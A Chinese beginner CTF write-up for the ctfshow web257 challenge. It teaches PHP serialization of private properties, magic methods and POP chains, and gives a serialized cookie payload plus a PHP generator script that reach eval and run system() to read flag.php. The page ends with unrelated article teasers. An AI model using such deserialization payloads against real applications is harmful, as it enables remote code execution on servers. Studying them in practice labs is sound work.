ctfshow-web257【保姆级wp】

写在最前:我发现现在网络上好多wp都是直接讲题目是怎么做的,可能对知道关于这道题中所讲的方法的一些前置知识人来说确实既是一个节约时间又能提供一个具体思路的好的writeup,但是对于我这样啥都不懂的人来说反而找不到真正适合的题解,要花大量的时间去找,去了解关于这道题目的前置知识,这对于一个自学者来说是最艰难也是最折磨的地方。因此,我希望我写的wp不仅仅是说这道题该怎么做,更是让一个完全没有基础的人也能看懂,而不是去反复的问AI这是啥意思,既是个人对零散知识的整合梳理,也是作为真正的萌新向wp。  【如果想详细了解可参阅php手册类与对象


一:前置知识

1.三种修饰符

修饰符类内部子类类外
public
protected
private

这里打勾代表能访问,这么看着其实有点一头雾水,还是举个栗子:

class A { private $x = 1; } $a = new A(); echo $a->x; // ❌ 报错:不能从外部访问 private 
  •  外部不能访问
  • 子类不能访问
  • 只有 A 类内部 能访问

在 PHP 里,不同权限的属性,序列化名字是不一样的

属性定义序列化里的名字
public $aa
protected $a\0*\0a
private $a\0类名\0a

这里其实可以参考之前我写的web255,当时构造的payload是这样的:

O:11:"ctfShowUser":3:{ s:8:"username";s:6:"xxxxxx"; s:8:"password";s:6:"xxxxxx"; s:5:"isVip";b:1; }

可以看到是直接写usernamepassword,这是因为那时候的定义的时候用的是public:

class ctfShowUser{ // 公共属性:用户名,默认值是 xxxxxx public $username='xxxxxx'; // 公共属性:密码,默认值是 xxxxxx public $password='xxxxxx'; // 是否是 VIP,默认 false(不是 VIP) public $isVip=false; // 检查当前对象是不是 VIP public function checkVip(){ // $this 指的是“当前这个对象” // 返回对象里的 isVip 属性 return $this->isVip; } 

而在这里定义时用的则是private,因此最前面要加上类名,具体的还是到后面题目中去看

2.普通方法名

“普通方法名”= 程序员自己随便起的函数名字,就比如说:

class A { function abc() {} function getInfo() {} function helloWorld() {} function 你开心就好() {} } 

这些都代表的是一个函数名字,abcgetinfo这类,这里就要区别于php的魔术方法,这些是不能改动的:

__construct // 构造函数 __destruct // 析构函数 __wakeup __toString 

之所以讲这个也是因为跟题目有关,慢慢看下去就了解了。

3.POP链

POP 链(Property-Oriented Programming)是通过“控制对象的属性”,利用已有类的魔术方法,在反序列化过程中自动执行危险代码。POP链能存在的原因是因为有unserialize() —— 自动创建对象和魔术方法 —— 自动执行。

基本结构:

一个完整的POP链是三段式:

[入口] → [传递] → [危险点] class A { public $b; function __destruct() { $this->b->run(); } } class B { public $c; function run() { eval($this->c); } } 

这里我们需要的是B里面的c去执行eval,但是B中没有任何魔术方法,而POP链中只有被程序自动调用的类才有机会去执行代码,因此我们要从A开始,构造的payload为:

O:1:"A":1:{ s:1:"b"; O:1:"B":1:{ s:1:"c"; s:10:"phpinfo();"; } } 

这样一个POP链形式的序列化字符串就形成了。


二:具体题目

给的代码如下:

<?php // ======================= // 用户类(POP 链的入口) // ======================= class ctfShowUser{ // 私有属性:用户名 // ⚠️ private:外部不能直接访问 // ⚠️ 反序列化时需要写成 \0ctfShowUser\0username private $username = 'xxxxxx'; // 私有属性:密码 private $password = 'xxxxxx'; // 私有属性:是否 VIP private $isVip = false; // 私有属性:保存一个“对象” // 表面上是 info,实际上可以被反序列化替换 private $class = 'info'; // 构造函数 public function __construct(){ // 正常情况下: // 每次 new ctfShowUser(),都会把 $class 设成 info 对象 $this->class = new info(); } // 登录函数 public function login($u, $p){ // 只是做字符串比较 // ❗ 返回值没有被 if 判断 // ❗ 成功 or 失败都不影响后续流程 return $this->username === $u && $this->password === $p; } // 析构函数(POP 链触发点) public function __destruct(){ // ⚠️ 关键危险点 // 程序“假设” $this->class 是 info 对象 // 但攻击者可以把它换成 backDoor 对象 $this->class->getInfo(); } } // ======================= // 正常信息类(安全) // ======================= class info{ // 私有属性 private $user = 'xxxxxx'; // 普通方法 public function getInfo(){ // 只是返回字符串 // ✔ 安全 return $this->user; } } // ======================= // 后门类(危险 Gadget) // ======================= class backDoor{ // 私有属性:存放攻击者的代码 private $code; // 与 info 同名的方法 public function getInfo(){ // ⚠️ 危险函数 // $this->code 完全可控(通过反序列化) eval($this->code); } } // ======================= // 主程序逻辑 // ======================= // 从 GET 获取参数(字符串) $username = $_GET['username']; $password = $_GET['password']; // 只要参数存在就进入 if (isset($username) && isset($password)) { // ⚠️ 致命漏洞 // 直接反序列化用户可控的 Cookie // 且没有 allowed_classes 限制 $user = unserialize($_COOKIE['user']); // 调用 login // ❗ login 成功与否不影响攻击 $user->login($username, $password); } 

这里就看到定义的时候用的是private,那么后面我们构造序列化字符串时就要加上类名了。

然后这里有两个getinfo,而getInfo() 执行的内容,取决于当前对象是哪个类的对象,这里我们需要的是含有eval的那个getinfo,所以我们要调用的就是backDoor,因此这里构造的payload则为:

O:11:"ctfShowUser":1:{s:18:"ctfShowUserclass";O:8:"backDoor":1:{s:14:"backDoorcode";s:23:"system("tac+flag.php");";}}

然后URL编码一下就可以了【我这里没写username和password,因此get里面传的就是默认值】

但是这里有个问题是我一个个手打过去很麻烦,可不可以编个程序跑一下,当然是可以的:

<?php class ctfShowUser{ private $class; public function __construct(){ $this->class=new backDoor(); } public function __destruct(){ $this->class->getInfo(); } } class backDoor{ private $code = "system('cat flag.php');"; public function getInfo(){ eval($this->code); } } echo urlencode(serialize(new ctfShowUser())); ?>

【其实这种序列化脚本还是挺简单的,照着题目给的改一下就行,都是公式化写法】

然后跑出来是这样的:

O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A23%3A%22system%28%27cat+flag.php%27%29%3B%22%3B%7D%7D 

hackbar里加个cookie写一下就行了,记得get传参的两个。

三:总结

通过这道题,其实我们并不是“学会了某一道 CTF 题”,而是完整走了一遍 PHP 反序列化漏洞的学习路径。如果用一句话概括这类题目,那就是:

攻击者并不是在“执行代码”,而是在“构造对象结构”,
程序自己会沿着既定逻辑把危险代码跑完。

下面从几个关键点来回顾。


1. private 并不是“防御”,只是“增加构造难度”

在很多新人的直觉里,private 会让人觉得“更安全”。
但在反序列化漏洞中:

  • private / protected / public都可以被反序列化控制
  • 区别只在于:
    序列化字符串里字段名怎么写

真正要记住的是这张表:

属性类型序列化里的名字
publica
protected\0*\0a
private\0类名\0a

所以这道题里:

private $class;

必须写成:

"\0ctfShowUser\0class"

 private 不是挡住你,而是逼我们“写对格式”


2.普通方法名 ≠ 魔术方法,真正“自动执行”的只有魔术方法

getInfo()run() 这种:

  • 只是 普通函数名
  • 不会自动执行
  • 必须有人去“调用它”

而真正关键的是这些 魔术方法

__construct __destruct __wakeup __toString

在这道题里,真正触发整个 POP 链的只有一句:

public function __destruct(){ $this->class->getInfo(); }

也就是说:

不是 getInfo() 危险,而是“谁在什么时候调用了它”

3.POP 链的本质:不是“危险函数”,而是“执行路径”

很多初学者会下意识去找:

  • eval
  • system
  • exec

但真正的分析顺序应该是:

  1. 程序一定会自动执行谁?
  2. 它会调用哪个属性 / 方法?
  3. 这个属性能不能被我替换成别的对象?
  4. 最终有没有走到危险函数?

所以一条标准 POP 链一定是:

入口(魔术方法) ↓ 中间对象(方法被调用) ↓ 危险点(eval / system)

在本题中对应关系是:

角色
POP 链入口ctfShowUser::__destruct
中间桥梁$this->class->getInfo()
执行点backDoor::getInfo → eval()

4.为什么一定要“从 ctfShowUser 开始构造对象”

原因只有一句话:

只有被程序“自动调用”的类,才有机会执行代码
  • backDoor 里虽然有 eval
  • 但程序 从来不会自动调用 backDoor
  • 它只是一个“工具类”

所以 payload 的最外层 必须是 ctfShowUser
让程序在脚本结束时自动触发 __destruct()
再一步步把执行流程“引到 backDoor”。


5.手写 payload 很痛苦,用 PHP 自动生成才是正解

手打序列化字符串的问题在于:

  • private 字段容易写错
  • 字符串长度容易错
  • 嵌套对象非常反人类

而用 PHP 本身来生成 payload:

echo urlencode(serialize(new ctfShowUser()));

好处是:

  • PHP 自动帮我们处理 \0类名\0属性
  • 不用管字符串长度
  • 结构 100% 合法

 这不是“偷懒”,而是标准做法


6.这道题真正学到的东西

如果把这道题抽象掉细节,那么我们掌握的是:

  • PHP 类 / 对象 / 访问修饰符的基本语义
  • private 属性在反序列化中的表现形式
  •  魔术方法在 POP 链中的作用
  • 为什么“有 eval ≠ 能 RCE”
  • 如何从源码逆推出 payload 结构
  • 如何用脚本而不是手算生成 payload

这些能力是 可以迁移到绝大多数 PHP 反序列化题目中的

Read more

Unreal Engine 4.27 + AirSim 无人机仿真环境搭建:澳大利亚农村场景更换教程

Unreal Engine 4.27 + AirSim 无人机仿真环境搭建:澳大利亚农村场景更换教程

前言         Unreal Engine 作为一款强大的游戏引擎,在无人机仿真领域也有着广泛的应用。结合 AirSim 插件,我们可以创建高度逼真的无人机飞行环境。本文将详细介绍如何在 Unreal Engine 4.27 中搭建基于澳大利亚农村场景(Rural Australia)的无人机仿真环境,为无人机算法开发和测试提供真实的虚拟场景。 环境准备 软件要求 * Unreal Engine 4.27:AirSim 对 UE4.27 支持最好 * Visual Studio 2019/2022:需要安装 C++ 桌面开发组件 * AirSim:微软开源的无人机 / 自动驾驶仿真平台 * Rural Australia 资源包:Unreal 官方免费场景资源 第一步:创建 Unreal Engine 项目

RISC-V开源处理器实战:从Verilog RTL设计到FPGA原型验证

RISC-V开源处理器实战:从Verilog RTL设计到FPGA原型验证

引言:开源浪潮下的RISC-V处理器设计 在芯片设计领域,RISC-V架构正以其开源免授权、模块化扩展和极简指令集三大优势重塑行业格局。与传统闭源架构不同,RISC-V允许开发者自由定制处理器核,从嵌入式微控制器到高性能服务器芯片均可覆盖。本文以Xilinx Vivado 2025工具链和蜂鸟E203处理器为核心,完整呈现从Verilog RTL设计到FPGA原型验证的全流程,为嵌入式工程师和硬件爱好者提供一套可复现的实战指南。 项目目标与技术栈 * 核心目标:基于RISC-V RV32I指令集,设计支持五级流水线的32位处理器核,实现基础算术运算、逻辑操作及访存功能,并在Xilinx Artix-7 FPGA开发板验证。 * 工具链:Xilinx Vivado 2025(逻辑设计、综合实现)、ModelSim(功能仿真)、Xilinx Artix-7 XC7A35T FPGA开发板(硬件验证)。 * 参考案例:蜂鸟E203处理器(芯来科技开源RISC-V核,已在Xilinx FPGA上完成移植验证,最高运行频率50MHz)。 一、数字系统设计流程:从需求到架构 1.

【Microi 吾码】基于 Microi 吾码低代码框架构建 Vue 高效应用之道

【Microi 吾码】基于 Microi 吾码低代码框架构建 Vue 高效应用之道

我的个人主页 文章专栏:Microi吾码 引言 在当今快速发展的软件开发领域,低代码开发平台正逐渐崭露头角,为开发者们提供了更高效的应用构建途径。Microi 吾码低代码框架结合 Vue的强大前端能力,更是为打造高效应用提供了绝佳的组合。在这里,我将深入探讨如何基于 Microi 吾码低代码框架构建 Vue 高效应用。 Microi吾码官网: https://microi.net GitEE开源地址: microi.net: 一:Microi吾码安装指南 1、系统要求 * 操作系统:支持Windows、Linux等主流操作系统。 * 数据库:需要安装并配置支持的数据库,如MySql5.5+、SqlServer2016+、Oracle11g+等。 * 其他软件:安装.NET 8 SDK、Redis,并且最好安装Git用于代码获取。对于一些高级功能,可能还需要安装Docker、MinIO、MongoDB、RabbitMQ、